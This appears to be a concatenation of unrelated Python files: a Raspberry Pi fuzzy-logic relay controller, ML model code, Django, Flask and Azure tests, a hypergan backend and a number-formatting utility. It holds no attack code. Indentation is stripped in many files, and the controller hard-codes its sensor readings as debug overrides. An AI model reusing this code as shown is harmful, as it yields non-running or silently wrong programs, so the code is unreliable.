def humidity_category(humidity_in=2):
humidity_cat_low = fuzz.interp_membership(humidity, humidity_low, humidity_in)
humidity_cat_high = fuzz.interp_membership(humidity, humidity_high, humidity_in)
return dict(low=humidity_cat_low, high=humidity_cat_high)
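# Worked example (illustrative numbers): for a normalized temperature of 5.0
# the Gaussian memberships above give roughly
#   cold = exp(-(5 - 0)**2 / (2 * 1.5**2)) ~ 0.004
#   warm = exp(-(5 - 5)**2 / (2 * 1.5**2)) = 1.0
#   hot  = exp(-(5 - 10)**2 / (2 * 1.5**2)) ~ 0.004
# i.e. temperature_category(5.0) ~ {'cold': 0.004, 'warm': 1.0, 'hot': 0.004}.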
# print membership
# Visualize these universes and membership functions
print('saving membership...')
fig, ax = plt.subplots(2, 1)
[t1, t2, t3] = ax[0].plot(temperature, temperature_cold, 'r', temperature, temperature_warm, 'm+', temperature,
temperature_hot, 'b--', label=['Temp. cold', 'Temp. warm', 'Temp. hot'])
ax[0].set_ylabel('Fuzzy membership')
ax[0].set_title('Temperature')
ax[0].set_ylim(-0.05, 1.05)
ax[0].set_xlim(0, 10)
lgd1 = ax[0].legend([t1, t2, t3], ['Temp. cold', 'Temp. warm', 'Temp. hot'], loc='center left', bbox_to_anchor=(1, 0.5))
[t1, t2] = ax[1].plot(humidity, humidity_low, 'r', humidity, humidity_high, 'b+')
ax[1].set_ylabel('Fuzzy membership')
ax[1].set_title('Humidity')
ax[1].set_ylim(-0.05, 1.05)
ax[1].set_xlim(0, 10)
lgd2 = ax[1].legend([t1, t2], ['Hum. low', 'Hum. high'], loc='center left', bbox_to_anchor=(1, 0.5))
plt.grid(True)
plt.tight_layout()
plt.show()  # no-op under the Agg backend; the figure is saved to a file below
fig.savefig('fuzzy_mem_temp_hum.png', dpi=100, bbox_extra_artists=(lgd1, lgd2, ), bbox_inches='tight')
print('done')
# sensing and make decision
print('program is ready for making decision based fuzzy logic')
machine_state = -1
try:
while 1:
print('sensing...')
sen_humidity, sen_temperature = Adafruit_DHT.read_retry(sensor, dht_pin)
        if sen_humidity is not None and sen_temperature is not None:
            print('Sensing: Temperature={0:0.1f}*C Humidity={1:0.1f}%'.format(sen_temperature, sen_humidity))
            # Debug overrides: fixed readings are used in place of the sensor values.
            sen_temperature = 18
            sen_humidity = 80
            # normalization
            norm_temperature = sen_temperature / 60.0
            norm_humidity = sen_humidity / 100.0
            print('Normalization: Temperature={0:.4f} Humidity={1:.4f}'
                  .format(norm_temperature, norm_humidity))
temp_in = temperature_category(norm_temperature)
hum_in = humidity_category(norm_humidity)
print('fuzzy membership: Temperature={0} Humidity={1}'.format(temp_in, hum_in))
# Determine the weight and aggregate
rule1 = np.fmax(temp_in['hot'], hum_in['low'])
rule2 = temp_in['warm']
rule3 = np.fmax(temp_in['warm'], hum_in['high'])
imp1 = np.fmin(rule1, comfort_low)
imp2 = np.fmin(rule2, comfort_ave)
imp3 = np.fmin(rule3, comfort_very)
            # np.fmax is a binary ufunc; a third positional argument would be
            # treated as `out`, so chain calls to aggregate all three implications.
            aggregate_membership = np.fmax(np.fmax(imp1, imp2), imp3)
# Defuzzify
result_comfort = fuzz.defuzz(comfort, aggregate_membership, 'centroid')
print(result_comfort)
# make decision based on experiment
if result_comfort >= 5.002:
if machine_state < 0:
machine_state = 1
print("turn on a machine")
GPIO.output(relay_pin, GPIO.HIGH)
else:
print("a machine already turn on")
else:
if machine_state > 0:
machine_state = 0
print("turn off a machine")
GPIO.output(relay_pin, GPIO.LOW)
else:
print("a machine already turn off")
time.sleep(2)
time.sleep(2)
except KeyboardInterrupt:
GPIO.output(relay_pin, GPIO.LOW)
GPIO.cleanup()
print('program is exit')
|
11556703
|
import sys
sys.path.append('../')
import torch
import torch.nn as nn
import math, random, sys
import argparse
from fast_jtnn import *
import rdkit
def load_model(vocab, model_path, hidden_size=450, latent_size=56, depthT=20, depthG=3):
vocab = [x.strip("\r\n ") for x in open(vocab)]
vocab = Vocab(vocab)
model = JTNNVAE(vocab, hidden_size, latent_size, depthT, depthG)
dict_buffer = torch.load(model_path)
model.load_state_dict(dict_buffer)
model = model.cuda()
torch.manual_seed(0)
return model
def main_sample(vocab, output_file, model_path, nsample, hidden_size=450, latent_size=56, depthT=20, depthG=3):
vocab = [x.strip("\r\n ") for x in open(vocab)]
vocab = Vocab(vocab)
model = JTNNVAE(vocab, hidden_size, latent_size, depthT, depthG)
dict_buffer = torch.load(model_path)
model.load_state_dict(dict_buffer)
model = model.cuda()
torch.manual_seed(0)
with open(output_file, 'w') as out_file:
for i in range(nsample):
out_file.write(str(model.sample_prior())+'\n')
if __name__ == '__main__':
lg = rdkit.RDLogger.logger()
lg.setLevel(rdkit.RDLogger.CRITICAL)
parser = argparse.ArgumentParser()
parser.add_argument('--nsample', type=int, required=True)
parser.add_argument('--vocab', required=True)
parser.add_argument('--model', required=True)
parser.add_argument('--output_file', required=True)
parser.add_argument('--hidden_size', type=int, default=450)
parser.add_argument('--latent_size', type=int, default=56)
parser.add_argument('--depthT', type=int, default=20)
parser.add_argument('--depthG', type=int, default=3)
args = parser.parse_args()
main_sample(args.vocab, args.output_file, args.model, args.nsample, args.hidden_size, args.latent_size, args.depthT, args.depthG)
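# Example invocation (hypothetical file names):
#   python sample.py --nsample 100 --vocab vocab.txt \
#       --model model_checkpoint.pt --output_file samples.txt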
|
11556719
|
import json
import os
from overrides import overrides
from typing import Any, List
from repro.data.output_writers import OutputWriter
from repro.data.types import InstanceDict
@OutputWriter.register("default")
class DefaultOutputWriter(OutputWriter):
"""
Writes a jsonl file with keys for the `instance_id`, `model_id`, and `prediction`.
"""
def __init__(self, include_input: bool = False):
super().__init__(True)
self.include_input = include_input
@overrides
def _write(
self,
instances: List[InstanceDict],
predictions: Any,
output_file_or_dir: str,
model_name: str,
*args,
**kwargs
) -> None:
output_file = output_file_or_dir
dirname = os.path.dirname(output_file)
if dirname:
os.makedirs(dirname, exist_ok=True)
with open(output_file, "w") as out:
for instance, prediction in zip(instances, predictions):
data = {
"instance_id": instance["instance_id"],
"model_id": model_name,
}
if self.include_input:
data["input"] = instance
data["prediction"] = prediction
out.write(json.dumps(data) + "\n")
|
11556735
|
import unittest
from myapp import create_app
from myapp.models.db_orm import db
from myapp.models.db_models import User
class TestModelUser(unittest.TestCase):
def setUp(self):
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
db.create_all()
# self.client = self.app.test_client(use_cookies=True)
self.client = self.app.test_client()
def tearDown(self):
db.session.remove()
db.drop_all()
self.app_context.pop()
def test_password_setter(self):
user = User(password='Password!')
self.assertTrue(user.password_hash is not None)
def test_no_password_getter(self):
user = User(password='Password!')
with self.assertRaises(AttributeError):
user.password
def test_password_verification(self):
user = User(password='Password!')
self.assertTrue(user.verify_password('Password!'))
self.assertFalse(user.verify_password('<PASSWORD>!'))
def test_password_salts_are_random(self):
user1 = User(password='Password!')
user2 = User(password='Password!')
self.assertTrue(user1.password_hash != user2.password_hash)
|
11556764
|
from functools import wraps
from django.core.exceptions import PermissionDenied
from django.views.decorators.csrf import csrf_exempt
from canvas import util, knobs, browse
from canvas.api_decorators import json_service
from canvas.exceptions import ServiceError
from canvas.metrics import Metrics
from canvas.redis_models import RateLimit
def short_id(id):
return util.base36encode(id)
def long_id(short_id):
return util.base36decode(short_id)
def check_rate_limit(request):
return RateLimit('apicall:' + request.META['REMOTE_ADDR'], knobs.PUBLIC_API_RATE_LIMIT).allowed()
def public_api_method(f):
@csrf_exempt
@json_service
@wraps(f)
def wrapper(*args, **kwargs):
try:
request = kwargs.get('request') or args[0]
if not check_rate_limit(request):
Metrics.api_rate_limited.record(request)
raise ServiceError("Slow down there, cowboy!")
payload = request.JSON
ids = payload.get('ids')
kwargs['payload'] = payload
ret = f(*args, **kwargs)
if not ret:
return {'documentation': f.__doc__}
else:
return ret
except ServiceError as se:
raise se
return wrapper
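# Hypothetical endpoint sketch (illustrative, not from the canvas codebase):
# the decorator injects the parsed JSON body as the `payload` kwarg and falls
# back to returning the docstring when the view returns nothing.
# @public_api_method
# def posts(request, payload=None):
#     """Returns data for the requested post ids."""
#     ids = payload.get('ids', [])
#     return {'posts': [long_id(i) for i in ids]}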
|
11556772
|
class OperatingSystem(object,ICloneable,ISerializable):
"""
Represents information about an operating system,such as the version and platform identifier. This class cannot be inherited.
OperatingSystem(platform: PlatformID,version: Version)
"""
def Clone(self):
"""
Clone(self: OperatingSystem) -> object
Creates an System.OperatingSystem object that is identical to this instance.
Returns: An System.OperatingSystem object that is a copy of this instance.
"""
pass
def GetObjectData(self,info,context):
"""
GetObjectData(self: OperatingSystem,info: SerializationInfo,context: StreamingContext)
Populates a System.Runtime.Serialization.SerializationInfo object with the data necessary to
deserialize this instance.
info: The object to populate with serialization information.
context: The place to store and retrieve serialized data. Reserved for future use.
"""
pass
def ToString(self):
"""
ToString(self: OperatingSystem) -> str
Converts the value of this System.OperatingSystem object to its equivalent string representation.
Returns: The string representation of the values returned by the System.OperatingSystem.Platform,
System.OperatingSystem.Version,and System.OperatingSystem.ServicePack properties.
"""
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod
def __new__(self,platform,version):
""" __new__(cls: type,platform: PlatformID,version: Version) """
pass
def __reduce_ex__(self,*args):
pass
def __repr__(self,*args):
""" __repr__(self: object) -> str """
pass
def __str__(self,*args):
pass
Platform=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a System.PlatformID enumeration value that identifies the operating system platform.
Get: Platform(self: OperatingSystem) -> PlatformID
"""
ServicePack=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the service pack version represented by this System.OperatingSystem object.
Get: ServicePack(self: OperatingSystem) -> str
"""
Version=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a System.Version object that identifies the operating system.
Get: Version(self: OperatingSystem) -> Version
"""
VersionString=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the concatenated string representation of the platform identifier,version,and service pack that are currently installed on the operating system.
Get: VersionString(self: OperatingSystem) -> str
"""
|
11556783
|
import io
import json
import requests
import pytest
from AzureStorage import (ASClient, storage_account_list, storage_account_create_update,
storage_blob_service_properties_get, storage_blob_service_properties_set,
storage_blob_containers_create, storage_blob_containers_update, storage_blob_containers_list)
app_id = 'app_id'
subscription_id = 'subscription_id'
resource_group_name = 'resource_group_name'
@pytest.fixture()
def client(mocker):
mocker.patch('AzureStorage.MicrosoftClient.get_access_token', return_value='token')
return ASClient(app_id, subscription_id, resource_group_name, False, False)
def util_load_json(path):
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
def test_storage_account_list(client, mocker):
"""
Given:
- AS Client
- An API response for storage account list
When:
- Running storage_account_list
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('./test_data/storage_account_list_response.json')
mocker.patch.object(ASClient, "storage_account_list_request", return_value=api_response)
result = storage_account_list(client=client, args={})
expected_hr = '### Azure Storage Account List\n' \
'|Account Name|Subscription ID|Resource Group|Kind|Status Primary|Status Secondary|Location|\n' \
'|---|---|---|---|---|---|---|\n' \
'| account_name_1 | subscription_id_1 | resource_group_name_1 | Storage | available | | location1 ' \
'|\n| account_name_2 | subscription_id_2 | resource_group_name_2 | Storage | available | available ' \
'| location_2 |\n'
assert result.outputs == api_response.get('value')
assert result.readable_output == expected_hr
def test_storage_account_single(client, mocker):
"""
Given:
- AS Client
- An API response for single storage account
When:
- Running storage_account_list with a given account_name argument
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/storage_account_single_response.json')
mocker.patch.object(ASClient, "storage_account_list_request", return_value=api_response)
result = storage_account_list(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Account List\n' \
'|Account Name|Subscription ID|Resource Group|Kind|Status Primary|Status Secondary|Location|\n' \
'|---|---|---|---|---|---|---|\n| ' \
'account_name | subscription_id | resource_group_name | Storage | available | available | eastus |\n'
assert result.outputs[0] == api_response
assert result.readable_output == expected_hr
def test_storage_account_create_update(client, mocker):
"""
Given:
- AS Client
- An API response for storage account create/update
When:
- Running storage_account_create_update with the required arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/storage_account_single_response.json')
response = requests.models.Response()
response._content = json.dumps(api_response).encode('utf-8')
mocker.patch.object(ASClient, "storage_account_create_update_request", return_value=response)
result = storage_account_create_update(client=client, args={'account_name': 'account_name', "sku": "Standard_GRS",
"kind": "Storage", "location": "eastus"})
expected_hr = '### Azure Storage Account\n' \
'|Account Name|Subscription ID|Resource Group|Kind|Status Primary|Status Secondary|Location|\n' \
'|---|---|---|---|---|---|---|\n' \
'| account_name | subscription_id | resource_group_name | Storage | available | available | eastus ' \
'|\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_service_properties_get(client, mocker):
"""
Given:
- AS Client
- An API response for get blob service properties
When:
- Running storage_blob_service_properties_get with a given account_name argument
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_service_properties_get_response.json')
mocker.patch.object(ASClient, "storage_blob_service_properties_get_request", return_value=api_response)
result = storage_blob_service_properties_get(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Blob Service Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|Change Feed|Delete Retention Policy|Versioning|\n'\
'|---|---|---|---|---|---|---|\n' \
'| default | account_name | subscription_id | resource_group_name | | false ' \
'| |\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_service_properties_set(client, mocker):
"""
Given:
- AS Client
- An API response for set blob service properties
When:
- Running storage_blob_service_properties_set with a given account_name argument
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_service_properties_set_response.json')
mocker.patch.object(ASClient, "storage_blob_service_properties_set_request", return_value=api_response)
result = storage_blob_service_properties_set(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Blob Service Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|Change Feed|Delete Retention Policy|Versioning|\n' \
'|---|---|---|---|---|---|---|\n' \
'| default | account_name | subscription_id | resource_group_name | | | ' \
'|\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_containers_create(client, mocker):
"""
Given:
- AS Client
- An API response for create blob container
When:
- Running storage_blob_containers_create with the given account_name and container_name arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_containers_create_update_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_create_update_request", return_value=api_response)
result = storage_blob_containers_create(client=client, args={'account_name': 'account_name',
'container_name': 'test'})
expected_hr = '### Azure Storage Blob Containers Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|\n' \
'|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups |\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_containers_update(client, mocker):
"""
Given:
- AS Client
- An API response for update blob container
When:
- Running storage_blob_containers_update with the given account_name and container_name arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_containers_create_update_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_create_update_request", return_value=api_response)
result = storage_blob_containers_update(client=client, args={'account_name': 'account_name',
'container_name': 'test'})
expected_hr = '### Azure Storage Blob Containers Properties\n' \
'|Name|Account Name|Subscription ID|Resource Group|Public Access|\n' \
'|---|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups | |\n'
assert result.outputs == api_response
assert result.readable_output == expected_hr
def test_storage_blob_containers_list(client, mocker):
"""
Given:
- AS Client
- An API response for blob containers list
When:
- Running storage_blob_containers_list
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('./test_data/blob_containers_list_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_list_request", return_value=api_response)
result = storage_blob_containers_list(client=client, args={'account_name': 'account_name'})
expected_hr = '### Azure Storage Blob Containers list\n' \
'|Container Name|Account Name|Subscription ID|Resource Group|Public ' \
'Access|Lease State|Last Modified Time|\n' \
'|---|---|---|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups | None | Available ' \
'| 2020-02-20T20:20:20.0000000Z |\n' \
'| test2 | account_name | subscription_id | resource_groups | None | ' \
'Available | 2020-02-20T20:20:20.0000000Z |\n'
assert result.outputs == api_response.get('value')
assert result.readable_output == expected_hr
def test_storage_blob_containers_single(client, mocker):
"""
Given:
- AS Client
- An API response for single blob container
When:
- Running storage_blob_containers_list with the given account_name and container_name arguments
Then:
- Verify result outputs
- Verify result readable outputs
"""
api_response = util_load_json('test_data/blob_containers_single_response.json')
mocker.patch.object(ASClient, "storage_blob_containers_list_request", return_value=api_response)
result = storage_blob_containers_list(client=client, args={'account_name': 'account_name',
'container_name': 'test'})
expected_hr = '### Azure Storage Blob Containers list\n' \
'|Container Name|Account Name|Subscription ID|Resource Group|Public ' \
'Access|Lease State|Last Modified Time|\n' \
'|---|---|---|---|---|---|---|\n' \
'| test | account_name | subscription_id | resource_groups | None | Available ' \
'| 2020-02-20T20:20:20.0000000Z |\n'
assert result.outputs[0] == api_response
assert result.readable_output == expected_hr
|
11556784
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
#--------------------------------------------------Base Module--------------------------------------------------#
class DepthwiseSeparableConv(nn.Module):
def __init__(self, input_dim, out_dim, kernel_size, conv_dim=1, padding=0, bias=True, activation=False,dilation=1):
super().__init__()
self.activation = activation
if conv_dim == 1:
self.conv = nn.Conv1d(in_channels=input_dim, out_channels=out_dim, kernel_size=kernel_size,
padding=padding, bias=bias,dilation=dilation)
if activation:
nn.init.kaiming_normal_(self.conv.weight,nonlinearity='relu')
else:
nn.init.xavier_normal_(self.conv.weight)
def forward(self, input):
input = input.transpose(1, 2)
out = self.conv(input)
out = out.transpose(1, 2)
if self.activation:
return F.relu(out)
else:
return out
class Highway(nn.Module):
def __init__(self, layer_num, dim):
super().__init__()
self.layer_num = layer_num
self.linear = nn.ModuleList([nn.Linear(dim, dim) for _ in range(layer_num)])
self.gate = nn.ModuleList([nn.Linear(dim, dim) for _ in range(layer_num)])
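    # highway layer: y = g * relu(W_i x) + (1 - g) * x, with gate g = sigmoid(W_g x)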
def forward(self, x):
for i in range(self.layer_num):
            gate = torch.sigmoid(self.gate[i](x))
nonlinear = F.relu(self.linear[i](x))
x = gate * nonlinear + (1 - gate) * x
return x
def GLU(input):
out_dim=input.shape[2]//2
a,b=torch.split(input,out_dim,dim=2)
    return a * torch.sigmoid(b)
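# Shape note for GLU (gated linear unit): the channel dimension is split in
# half and one half gates the other, so a (batch, seq, 2*C) input yields a
# (batch, seq, C) output, e.g. torch.randn(2, 7, 16) -> shape (2, 7, 8).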
class DimReduce(nn.Module):
def __init__(self, input_dim, out_dim,kernel_size):
super().__init__()
self.convout = nn.Conv1d(input_dim, out_dim*2, kernel_size, padding=kernel_size // 2)
nn.init.xavier_normal_(self.convout.weight)
def forward(self, input):
input = input.transpose(1, 2)
input = self.convout(input)
input = input.transpose(1, 2)
out=GLU(input)
return out
class Embedding(nn.Module):
def __init__(self, char_dim, word_dim, word_len, out_dim, kernel_size, dropout=0.1):
super().__init__()
self.conv1d = DepthwiseSeparableConv(char_dim, char_dim, kernel_size, padding=kernel_size // 2,activation=True)
self.highway = Highway(2, char_dim + word_dim)
self.dropout = dropout
self.char_dim = char_dim
self.word_len = word_len
def forward(self, word_emb, char_emb):
batch_size = word_emb.shape[0]
seq_len = word_emb.shape[1]
char_emb = char_emb.view([-1, self.word_len, self.char_dim])
char_emb = self.conv1d(char_emb)
char_emb, _ = torch.max(char_emb, dim=1)
char_emb = char_emb.view(batch_size, seq_len, self.char_dim)
emb = torch.cat([word_emb, char_emb], dim=2)
emb = self.highway(emb)
return emb
class Similarity(nn.Module):
def __init__(self, input_dim, dropout=0.1):
super().__init__()
self.dropout = dropout
self.ff1=nn.Linear(10,10)
self.ff2=nn.Linear(10,1)
def forward(self, article, template,article_mask,template_mask):
article_len = article.shape[1]
template_len = template.shape[1]
c=article.unsqueeze(dim=2)
c=c.repeat([1,1,template_len,1])
q=template.unsqueeze(dim=1)
q=q.repeat([1,article_len,1,1])
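        # Gaussian-kernel similarity: S[b, i, j] = exp(-||article_i - template_j||^2)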
S=q-c
S=torch.sum(S*S,dim=3)
S=torch.exp(-1*S)
article_mask=article_mask.unsqueeze(dim=2)
article_mask=article_mask.repeat([1,1,template_len])
template_mask=template_mask.unsqueeze(dim=1)
template_mask=template_mask.repeat([1,article_len,1])
S=S*article_mask*template_mask
row_max,_=torch.max(S,dim=2)
row_max,_=row_max.topk(10,dim=1,largest=True)
row_max=F.relu(self.ff1(row_max))
row_max=self.ff2(row_max)
out=row_max
out=out.squeeze()
return out
#--------------------------------------------------GLDR Module--------------------------------------------------#
class ResidualBlock(nn.Module):
def __init__(self, input_dim,kernel_size,dilation):
super().__init__()
self.conv1=DepthwiseSeparableConv(input_dim,input_dim*2,kernel_size,padding=kernel_size//2*dilation,dilation=dilation)
def forward(self, input):
out=self.conv1(input)
out=GLU(out)
out=input+out
return out
class ConvEncoder(nn.Module):
def __init__(self,input_dim,kernel_size,conv_num,exp_num=5,refine_num=3,dropout=0.1):
super().__init__()
self.dropout=dropout
self.exp_conv=nn.Sequential()
dilation=1
for i in range(conv_num):
self.exp_conv.add_module(str(i),ResidualBlock(input_dim,kernel_size,dilation))
if i<exp_num:
dilation*=2
self.refine=nn.Sequential()
for i in range(refine_num):
self.refine.add_module(str(i),ResidualBlock(input_dim,kernel_size,dilation=1))
def forward(self, input):
out=self.exp_conv(input)
out=self.refine(out)
out=F.dropout(out,p=self.dropout,training=self.training)
return out
class FastRerank(nn.Module):
def __init__(self, char_dim, char_vocab_size, word_len, word_dim, word_mat, emb_dim, kernel_size,
encoder_block_num,model_block_num, dropout=0.1):
super().__init__()
self.word_emb = nn.Embedding(word_mat.shape[0],word_dim)
self.conv_encoder=ConvEncoder(word_dim,kernel_size,conv_num=encoder_block_num,dropout=dropout)
self.similarity = Similarity(word_dim, dropout)
def forward(self, article_word, article_char, template_word, template_char,article_mask,template_mask):
article_word = self.word_emb(article_word)
template_word = self.word_emb(template_word)
article=article_word
template=template_word
article = self.conv_encoder(article)
template = self.conv_encoder(template)
score = self.similarity(article, template,article_mask,template_mask)
return score
|
11556795
|
from test_project.settings import MIDDLEWARE
from django.contrib.auth.models import Group, User
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase
from test_project.testapp.models import UserAccount
class ViewsTestCase(APITestCase):
def setUp(self):
UserAccount.objects.all().delete()
User.objects.all().delete()
Group.objects.all().delete()
def test_admin_can_do_anything_with_logs(self):
admin_group = Group.objects.create(name="admin")
admin_user = User.objects.create()
admin_user.groups.add(admin_group)
self.client.force_authenticate(user=admin_user)
url = reverse("get-logs")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
url = reverse("delete-logs")
response = self.client.delete(url, format="json")
self.assertEqual(response.status_code, 200)
def test_dev_can_only_get_logs(self):
dev_group = Group.objects.create(name="dev")
dev_user = User.objects.create()
dev_user.groups.add(dev_group)
self.client.force_authenticate(user=dev_user)
url = reverse("get-logs")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
url = reverse("delete-logs")
response = self.client.delete(url, format="json")
self.assertEqual(response.status_code, 403)
def test_anonymous_user_can_view_landing_page(self):
url = reverse("get-landing-page")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
def test_authenticated_user_can_view_landing_page(self):
user = User.objects.create()
self.client.force_authenticate(user=user)
url = reverse("get-landing-page")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, 200)
|
11556809
|
import pytest
from django.urls import reverse
from articles.views import ArticleListView
from tests.factories import ArticleFactory
@pytest.mark.django_db
class TestVirtualFields(object):
def _request(self, admin_client):
response = admin_client.get(reverse('articles:list'))
assert response.status_code == 200
return response
def _assert_list_items_len(self, response, length):
assert 'list_items' in response.context_data
assert len(response.context_data['list_items']) == length
def test_virtual_field(self, admin_client):
"""
Virtual field displayed in ListView
"""
article = ArticleFactory()
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'category']
response = self._request(admin_client)
self._assert_list_items_len(response, 1)
item = response.context_data['list_items'][0]
assert item['fields'][0]['value'] == article.title
assert item['fields'][1]['value'] == article.description
assert item['fields'][3]['value'] == article.category.name
def test_missing_virtual_field(self, admin_client):
"""
        A wrong virtual field name is silently omitted from the list
"""
article = ArticleFactory() # noqa
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'virtual_field']
response = self._request(admin_client)
search_virtual_field = False
for field in response.context_data['list_items'][0]['fields']:
if field['type'] == 'field' and 'virtual_field' in field['field']:
search_virtual_field = True
assert search_virtual_field is False
def test_missing_virtual_field_error(self, admin_client):
"""
Error happens on wrong virtual field name
"""
article = ArticleFactory()
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'virtual_field']
exc = pytest.raises(
AttributeError, view.get_field_value, 'virtual_field', article)
assert str(exc.value) == \
"'Article' object has no attribute 'virtual_field'", \
exc.value.message
def test_missing_virtual_field_execution_attribute_error(self,
admin_client):
"""
Error happens on wrong virtual field name
"""
article = ArticleFactory()
view = ArticleListView()
view.fields = ['title', 'description', 'published', 'broken']
view.get_broken_field = lambda obj: obj.unknown_field
exc = pytest.raises(
AttributeError, view.get_field_value, 'broken', article)
assert str(exc.value) == \
"'Article' object has no attribute 'unknown_field'", \
exc.value.message
|
11556842
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from mwptoolkit.model.Seq2Seq import dns,ept,groupatt,lstm,mathen,rnnencdec,saligned,transformer,rnnvae
from mwptoolkit.model.Seq2Seq.dns import DNS
from mwptoolkit.model.Seq2Seq.ept import EPT
from mwptoolkit.model.Seq2Seq.groupatt import GroupATT
from mwptoolkit.model.Seq2Seq.lstm import LSTM
from mwptoolkit.model.Seq2Seq.mathen import MathEN
from mwptoolkit.model.Seq2Seq.rnnencdec import RNNEncDec
from mwptoolkit.model.Seq2Seq.rnnvae import RNNVAE
from mwptoolkit.model.Seq2Seq.saligned import Saligned
from mwptoolkit.model.Seq2Seq.transformer import Transformer
|
11556845
|
from .backend import Backend
import torch.multiprocessing as mp
from hypergan.gan_component import ValidationException, GANComponent
import torch.utils.data as data
import hyperchamber as hc
import hypergan as hg
import copy
import torch
import time
def create_input(input_config):
klass = GANComponent.lookup_function(None, input_config['class'])
return klass(input_config)
def train(device, gan, save_file, inputs, done_event):
gan.inputs = inputs
from hypergan.trainable_gan import TrainableGAN
trainable_gan = TrainableGAN(gan, backend_name = "single-gpu", save_file = save_file)
#torch.manual_seed(device)
done_event.set()
    while True:
trainable_gan.step()
class HogwildBackend(Backend):
"""https://towardsdatascience.com/this-is-hogwild-7cc80cd9b944"""
def __init__(self, trainable_gan, devices):
self.trainable_gan = trainable_gan
self.processes = []
done_events = []
mp.set_start_method('spawn', force=True)
for component in trainable_gan.gan.generator_components() + trainable_gan.gan.discriminator_components():
component.share_memory()
if devices == "-1":
print("Running on all available devices: ", torch.cuda.device_count())
devices = list(range(torch.cuda.device_count()))
else:
devices = [int(d) for d in devices.split(",")]
print("Devices:", devices)
#gan.inputs = inputs
num_processes=4
for device in range(num_processes):
done_event = mp.Event()
inputs = self.trainable_gan.gan.inputs.to(self.trainable_gan.gan.device)
p = mp.Process(target=train, args=(device, trainable_gan.gan, trainable_gan.save_file, inputs, done_event))
p.start()
self.processes.append(p)
done_event.wait()
def save(self):
self.trainable_gan.save_locally()
def step(self):
time.sleep(0.1)
|
11556903
|
import math
import re
from decimal import Decimal
class NumUtil(object):
"""
- number util
"""
    UK = 100000000  # 100 million (Korean numeric unit "eok")
@staticmethod
    def int2digit(n, base=10):  # base: radix of the output representation
res = ''
while n > 0:
n, r = divmod(n, base)
res = str(r) + res
return res
@staticmethod
def comma_str(n, precision=0):
"""
        :param n: the number to format (string or numeric)
        :param precision: number of decimal places
"""
try:
if n is None:
return None
if precision > 0:
n = float(n)
else:
n = int(float(n))
if isinstance(n, int):
return r'{:,d}'.format(n)
elif isinstance(n, float):
rule = r'{:,.%df}' % precision
return rule.format(n)
else:
return n
except Exception: # @UnusedVariable
return n
@staticmethod
def auto_convert(num):
try:
return int(num)
except:
try:
return float(num)
except:
try:
return str(num)
except:
return num
@staticmethod
def to_digit(num):
try:
_num = ''
for a in str(num):
if ('0' <= a <= '9') or a in '-.':
_num += a
_num = _num.lstrip('0')
return int(_num)
except:
return 0
@staticmethod
def has_digit(num):
for a in str(num):
if a.isdigit():
return True
return False
@staticmethod
def remove_comma(line):
return re.sub(r'''(\d),(\d{1})''', r'''\1\2''', line)
@staticmethod
def to_readable(n, min_decimal=0.001, max_decimal=1000):
try:
if (0 < math.fabs(n) < min_decimal) or (max_decimal < math.fabs(n)):
return "{:.0e}".format(Decimal(n)).replace('+', '') # scientific notation
else:
return n # decimal notation
except:
return n
@staticmethod
def is_float(string):
try:
float(string)
return True
except ValueError:
return False
@staticmethod
def is_int(string):
try:
int(string)
return True
except ValueError:
return False
@staticmethod
def base_num(v: float):
try:
v_str = str(float(v))
if v_str.endswith('.0'):
v_str = v_str.replace('.0', '')
if v_str.count('.') > 0:
v_str = v_str.split('.')[1]
return 10 ** (-len(v_str))
else:
return 10 ** (v_str.count('0'))
# if v_str.endswith('.0'):
# v_str = v_str.replace('.0', '')
# # print()
# # print(v_str)
# try:
# a, b = v_str.split('.')
# # print('a:', a, 'b:', b)
# return 10 ** (-len(b))
# except:
# return 10 ** (len(v_str)-1)
except:
return None
if __name__ == '__main__':
print(NumUtil.base_num(3.5))
